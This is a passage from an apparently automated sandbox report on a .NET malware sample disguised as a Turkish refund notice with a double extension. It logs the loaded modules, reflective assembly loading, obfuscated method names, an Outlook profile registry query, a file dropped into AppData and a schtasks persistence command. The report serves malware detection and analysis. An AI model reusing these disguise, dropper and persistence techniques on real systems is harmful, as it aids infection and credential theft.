                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: NRtD.pdbSHA256 source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, SOFcFE.exe.1.dr
                Source: Binary string: NRtD.pdb source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, SOFcFE.exe.1.dr

                Data Obfuscation

                barindex
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, authorizationForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: SOFcFE.exe.1.dr, authorizationForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.3eca230.0.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.cs.Net Code: hOpvyx6Zcc System.Reflection.Assembly.Load(byte[])
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.5870000.4.raw.unpack, MainForm.cs.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.cs.Net Code: hOpvyx6Zcc System.Reflection.Assembly.Load(byte[])
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeStatic PE information: 0xBF3BC221 [Tue Sep 1 20:22:57 2071 UTC]
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_010A47B0 push esi; iretd 1_2_010A47B2
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_010A465B push edx; iretd 1_2_010A4662
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_010A4658 push edx; iretd 1_2_010A465A
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_010A46BB push edx; iretd 1_2_010A46BE
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_010A46B8 push edx; iretd 1_2_010A46BA
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeCode function: 1_2_010A46BF push edx; iretd 1_2_010A46C2
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_0267465B push edx; iretd 16_2_02674662
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_02674658 push edx; iretd 16_2_0267465A
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_026746BF push edx; iretd 16_2_026746C2
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_026746BB push edx; iretd 16_2_026746BE
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_026746B8 push edx; iretd 16_2_026746BA
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 16_2_026747B0 push esi; iretd 16_2_026747B2
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_02C30007 push 00300100h; ret 20_2_02C3001A
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A7C75D push es; ret 20_2_06A7C7C0
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exeStatic PE information: section name: .text entropy: 7.588327362841595
                Source: SOFcFE.exe.1.drStatic PE information: section name: .text entropy: 7.588327362841595
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, wfmuxKccGtsDajMlAe.csHigh entropy of concatenated method names: 'OFNMeY08RZ', 'qooMTFRYAO', 'UmcYCeftjN', 'meTYGTXb3o', 'dJIM3tg1RY', 'Ef9MW42Y2M', 'G1aMhp6Cas', 'NfFMuVNOiC', 'SumMr7axBG', 'WvYMFlVHNg'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, qfVZ9t1fu6WDpyoTODH.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eUbPuTJwP4', 'WxePr4Ic8Q', 'i2bPFK5HF9', 'ffjPOWNyJ0', 'qwgPHST8ek', 'AfUP0vHQMw', 'AAoPKXEXKf'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, AkvZU4WDIaFkxJmh7r.csHigh entropy of concatenated method names: 'QePDuVyYBW', 'Lw9DrmqQtw', 'wKEDFA9vFu', 'zYkDOuNZpA', 'dCgDHdo44y', 'xIsD0PiDAA', 'iubDK0pAvv', 'CpMDe7beF7', 'JgkDsAUS3x', 'vwDDT6gFh2'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, b2mCNG10iQkY19oTwYA.csHigh entropy of concatenated method names: 'jMqR1XVLKm', 'wM7RN6SktP', 'MMqRymU4gw', 'PXrRiLFSWo', 'TtpRIIxplk', 'kBvRxIJbHG', 'FM0RlyKDR9', 'UyJR4xSv43', 'iotRbCacGv', 'nYmRBUCcof'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, hLi8mXJ5Khswjlivkb.csHigh entropy of concatenated method names: 'BDm2f5ElpD', 'Oec2DZOLrN', 'JwY2kklVBd', 'StV2wJcW0B', 'HyM2LjlMfN', 'mfqkHDPnFP', 'iQwk0gp1ej', 'Xt0kKCUqd0', 'iouke22xIe', 'axskspvN6t'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, sfppKNqtuStwuHs2PL.csHigh entropy of concatenated method names: 'R6wRGVUWvx', 'uXyRnrmeHk', 'KTcRvJd7Xy', 'rXGRXKVMRt', 'lJNRDE8G5P', 'UnqRkcbxpX', 'sGmR26QG4K', 'nQhYKT1RNP', 'P2sYeyIuML', 'pMcYsvYI68'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, YuOfOPHITqDbKEIJ9U.csHigh entropy of concatenated method names: 'vb7yjt2D2', 'rjYisIsYe', 'uXXxXgLFa', 'BVhlStUG4', 'H9ObnC0r4', 'KqYBYCiST', 'lUNHhiQ80hpvqj4f6G', 'xrsCsvi5fXTpegWPi4', 'n1Xmbrd9GQ34gYhd0o', 'hYVYoCASH'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gCmqqu34SWaskVT2xX.csHigh entropy of concatenated method names: 'QW8nfX3DxC', 'Y9RnXYgKYD', 'AVdnD9EfWE', 'DWunqKUuFe', 'simnkFs9u9', 'wyln2RUhyR', 'gvonwbsdwS', 'HGLnLcg8dG', 'yoAnEuHcmw', 'bdpnAsPPj2'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, fh0VDChk6xbBJVGHfn.csHigh entropy of concatenated method names: 'iGxg4Hke4k', 'FiUgbNodeP', 'zUCgmNidVO', 'YQQgcZI97h', 'xaTg7aj9vE', 'EeVgtQ4MAW', 'kIVgZUgmK4', 'riJgQiMMs0', 'jKegdIjXf1', 'HtUg3BktZR'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, xLgx0wL9epL6YDiocQ.csHigh entropy of concatenated method names: 'jijw1bKQoJ', 'jAOwNk9buI', 'hbGwyPoaEi', 'eKlwiXaajX', 'BdQwIjLBG0', 'cswwxavNfY', 'BUpwlenTGf', 'p8Dw4vxZZq', 'x0jwbHCCTj', 'tt9wBC898g'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, LLP85LTDBHgT5Iin7N.csHigh entropy of concatenated method names: 'mksqinZTmH', 'QSUqx4kNkL', 'XhTq47C0Iv', 'WCMqbPGT7G', 'E7yq8Gl6Td', 'Vx8qU7w6Tl', 'XAnqMkClux', 'LXjqYFarEi', 'u0SqRd8Gay', 'b1dqP88HOG'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, XPp2DtzlxtLiZfOYCO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qMlRgeOvCP', 'nfsR8knFv7', 'kIARUGgUkq', 'HfcRMrkGoG', 'DdsRYp0gZG', 'gnaRR38phV', 'MO2RPMF3ub'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, RSYeSwYT0Sh5pRPAbT.csHigh entropy of concatenated method names: 'Dispose', 'zklGsPxsHV', 'g3CScc5bbG', 'QZKjj65YcT', 'WNTGT6enkE', 'KDiGzPePyZ', 'ProcessDialogKey', 'sYPSCeJLX8', 'sjySGgmnxr', 'LwlSSYtBuj'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, T47EeKuAlyHS1bEdGK.csHigh entropy of concatenated method names: 'wOLYm2MP6N', 'mZoYcl2U9u', 'jwaY5ldwFK', 'troY7IOgQi', 'x1kYu8NO7E', 'xHCYtiYIwN', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, IoII6EEbDCScbo28Np.csHigh entropy of concatenated method names: 'g4Q8diZUls', 'xEa8WnfNBc', 'Auk8uAyN8m', 'cZi8rxZVdv', 'J5l8cbUepV', 'M3185uaraa', 'jAc87pi2qS', 'X0Z8tolEnA', 'xqS8Jtrhoa', 'b748Z5aDhf'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, Sm0QWOUtRIVaGPnUQj.csHigh entropy of concatenated method names: 'CJkYXehmWF', 'QVLYD44ftN', 'GsuYqfj1N3', 'KkCYktqkTs', 'KDyY2fePJ2', 'zHVYw28hX3', 'ybOYLYp6Bl', 'JpUYEXbbH7', 'LDyYAwKZiI', 'neDY9pcyPZ'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, yx3eKTRD6e5DRY0EXd.csHigh entropy of concatenated method names: 'hvhMAgvqeq', 'AnbM9q6CNC', 'ToString', 'X6eMXTJoBL', 'OsWMD4GS0B', 'y2FMq6o0TZ', 'YVTMkIcK1b', 'RUhM2sjmOd', 'Hq4MwrkBi3', 'A2lMLiJrYN'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, OldAHhkVUFSgVhwLNN.csHigh entropy of concatenated method names: 'w9twXmWo2w', 'l6IwqehMMI', 'A6Sw2np7Av', 'cwS2TyoAE7', 'wTX2zSVA0e', 'zjawCtL0Bx', 'xbTwGDkWJZ', 'VD7wS7dJii', 'jP3wnU4eOG', 'OZlwvrGFLY'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, gyQy9mKk9Sj4qkfZTl.csHigh entropy of concatenated method names: 'jTSGw4nt4P', 'wdoGLj8pet', 'itjGAgZhm2', 'aKqG9ec997', 'LwXG8E5yE0', 'v3mGUY9MOi', 'GPEJ5kEdY0l3adFpK9', 'JauLGez7RxAu7idIcS', 'lUcGG4kXOL', 'KbhGnCwZeu'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, i9NgCZSWkgDvF746L2.csHigh entropy of concatenated method names: 'LENkIjuKTN', 'OafklcsJpk', 'a9Fq5eWQ3v', 'vdvq7ER0yp', 'c5xqtP0heT', 'Ts7qJCEbli', 'btwqZFplLy', 'W4IqQ7vJhC', 'WPRq6trck7', 'mI4qd3bwuS'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.49ac540.3.raw.unpack, lQiCylDbuWK8hAmcEC.csHigh entropy of concatenated method names: 'ToString', 'mOaU3YFUso', 'KCEUc0Y4bC', 'mfoU5wXYcy', 'onvU7YNIY5', 'tpuUt3Mlxi', 'YS6UJ8yXyH', 'dDmUZfBq9I', 'zvCUQURaJA', 'unRU6NVc1U'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, wfmuxKccGtsDajMlAe.csHigh entropy of concatenated method names: 'OFNMeY08RZ', 'qooMTFRYAO', 'UmcYCeftjN', 'meTYGTXb3o', 'dJIM3tg1RY', 'Ef9MW42Y2M', 'G1aMhp6Cas', 'NfFMuVNOiC', 'SumMr7axBG', 'WvYMFlVHNg'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, qfVZ9t1fu6WDpyoTODH.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eUbPuTJwP4', 'WxePr4Ic8Q', 'i2bPFK5HF9', 'ffjPOWNyJ0', 'qwgPHST8ek', 'AfUP0vHQMw', 'AAoPKXEXKf'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, AkvZU4WDIaFkxJmh7r.csHigh entropy of concatenated method names: 'QePDuVyYBW', 'Lw9DrmqQtw', 'wKEDFA9vFu', 'zYkDOuNZpA', 'dCgDHdo44y', 'xIsD0PiDAA', 'iubDK0pAvv', 'CpMDe7beF7', 'JgkDsAUS3x', 'vwDDT6gFh2'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, b2mCNG10iQkY19oTwYA.csHigh entropy of concatenated method names: 'jMqR1XVLKm', 'wM7RN6SktP', 'MMqRymU4gw', 'PXrRiLFSWo', 'TtpRIIxplk', 'kBvRxIJbHG', 'FM0RlyKDR9', 'UyJR4xSv43', 'iotRbCacGv', 'nYmRBUCcof'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, hLi8mXJ5Khswjlivkb.csHigh entropy of concatenated method names: 'BDm2f5ElpD', 'Oec2DZOLrN', 'JwY2kklVBd', 'StV2wJcW0B', 'HyM2LjlMfN', 'mfqkHDPnFP', 'iQwk0gp1ej', 'Xt0kKCUqd0', 'iouke22xIe', 'axskspvN6t'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, sfppKNqtuStwuHs2PL.csHigh entropy of concatenated method names: 'R6wRGVUWvx', 'uXyRnrmeHk', 'KTcRvJd7Xy', 'rXGRXKVMRt', 'lJNRDE8G5P', 'UnqRkcbxpX', 'sGmR26QG4K', 'nQhYKT1RNP', 'P2sYeyIuML', 'pMcYsvYI68'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, YuOfOPHITqDbKEIJ9U.csHigh entropy of concatenated method names: 'vb7yjt2D2', 'rjYisIsYe', 'uXXxXgLFa', 'BVhlStUG4', 'H9ObnC0r4', 'KqYBYCiST', 'lUNHhiQ80hpvqj4f6G', 'xrsCsvi5fXTpegWPi4', 'n1Xmbrd9GQ34gYhd0o', 'hYVYoCASH'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gCmqqu34SWaskVT2xX.csHigh entropy of concatenated method names: 'QW8nfX3DxC', 'Y9RnXYgKYD', 'AVdnD9EfWE', 'DWunqKUuFe', 'simnkFs9u9', 'wyln2RUhyR', 'gvonwbsdwS', 'HGLnLcg8dG', 'yoAnEuHcmw', 'bdpnAsPPj2'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, fh0VDChk6xbBJVGHfn.csHigh entropy of concatenated method names: 'iGxg4Hke4k', 'FiUgbNodeP', 'zUCgmNidVO', 'YQQgcZI97h', 'xaTg7aj9vE', 'EeVgtQ4MAW', 'kIVgZUgmK4', 'riJgQiMMs0', 'jKegdIjXf1', 'HtUg3BktZR'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, xLgx0wL9epL6YDiocQ.csHigh entropy of concatenated method names: 'jijw1bKQoJ', 'jAOwNk9buI', 'hbGwyPoaEi', 'eKlwiXaajX', 'BdQwIjLBG0', 'cswwxavNfY', 'BUpwlenTGf', 'p8Dw4vxZZq', 'x0jwbHCCTj', 'tt9wBC898g'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, LLP85LTDBHgT5Iin7N.csHigh entropy of concatenated method names: 'mksqinZTmH', 'QSUqx4kNkL', 'XhTq47C0Iv', 'WCMqbPGT7G', 'E7yq8Gl6Td', 'Vx8qU7w6Tl', 'XAnqMkClux', 'LXjqYFarEi', 'u0SqRd8Gay', 'b1dqP88HOG'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, XPp2DtzlxtLiZfOYCO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qMlRgeOvCP', 'nfsR8knFv7', 'kIARUGgUkq', 'HfcRMrkGoG', 'DdsRYp0gZG', 'gnaRR38phV', 'MO2RPMF3ub'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, RSYeSwYT0Sh5pRPAbT.csHigh entropy of concatenated method names: 'Dispose', 'zklGsPxsHV', 'g3CScc5bbG', 'QZKjj65YcT', 'WNTGT6enkE', 'KDiGzPePyZ', 'ProcessDialogKey', 'sYPSCeJLX8', 'sjySGgmnxr', 'LwlSSYtBuj'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, T47EeKuAlyHS1bEdGK.csHigh entropy of concatenated method names: 'wOLYm2MP6N', 'mZoYcl2U9u', 'jwaY5ldwFK', 'troY7IOgQi', 'x1kYu8NO7E', 'xHCYtiYIwN', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, IoII6EEbDCScbo28Np.csHigh entropy of concatenated method names: 'g4Q8diZUls', 'xEa8WnfNBc', 'Auk8uAyN8m', 'cZi8rxZVdv', 'J5l8cbUepV', 'M3185uaraa', 'jAc87pi2qS', 'X0Z8tolEnA', 'xqS8Jtrhoa', 'b748Z5aDhf'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, Sm0QWOUtRIVaGPnUQj.csHigh entropy of concatenated method names: 'CJkYXehmWF', 'QVLYD44ftN', 'GsuYqfj1N3', 'KkCYktqkTs', 'KDyY2fePJ2', 'zHVYw28hX3', 'ybOYLYp6Bl', 'JpUYEXbbH7', 'LDyYAwKZiI', 'neDY9pcyPZ'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, yx3eKTRD6e5DRY0EXd.csHigh entropy of concatenated method names: 'hvhMAgvqeq', 'AnbM9q6CNC', 'ToString', 'X6eMXTJoBL', 'OsWMD4GS0B', 'y2FMq6o0TZ', 'YVTMkIcK1b', 'RUhM2sjmOd', 'Hq4MwrkBi3', 'A2lMLiJrYN'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, OldAHhkVUFSgVhwLNN.csHigh entropy of concatenated method names: 'w9twXmWo2w', 'l6IwqehMMI', 'A6Sw2np7Av', 'cwS2TyoAE7', 'wTX2zSVA0e', 'zjawCtL0Bx', 'xbTwGDkWJZ', 'VD7wS7dJii', 'jP3wnU4eOG', 'OZlwvrGFLY'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, gyQy9mKk9Sj4qkfZTl.csHigh entropy of concatenated method names: 'jTSGw4nt4P', 'wdoGLj8pet', 'itjGAgZhm2', 'aKqG9ec997', 'LwXG8E5yE0', 'v3mGUY9MOi', 'GPEJ5kEdY0l3adFpK9', 'JauLGez7RxAu7idIcS', 'lUcGG4kXOL', 'KbhGnCwZeu'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, i9NgCZSWkgDvF746L2.csHigh entropy of concatenated method names: 'LENkIjuKTN', 'OafklcsJpk', 'a9Fq5eWQ3v', 'vdvq7ER0yp', 'c5xqtP0heT', 'Ts7qJCEbli', 'btwqZFplLy', 'W4IqQ7vJhC', 'WPRq6trck7', 'mI4qd3bwuS'
                Source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.a000000.5.raw.unpack, lQiCylDbuWK8hAmcEC.csHigh entropy of concatenated method names: 'ToString', 'mOaU3YFUso', 'KCEUc0Y4bC', 'mfoU5wXYcy', 'onvU7YNIY5', 'tpuUt3Mlxi', 'YS6UJ8yXyH', 'dDmUZfBq9I', 'zvCUQURaJA', 'unRU6NVc1U'
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeFile created: C:\Users\user\AppData\Roaming\SOFcFE.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
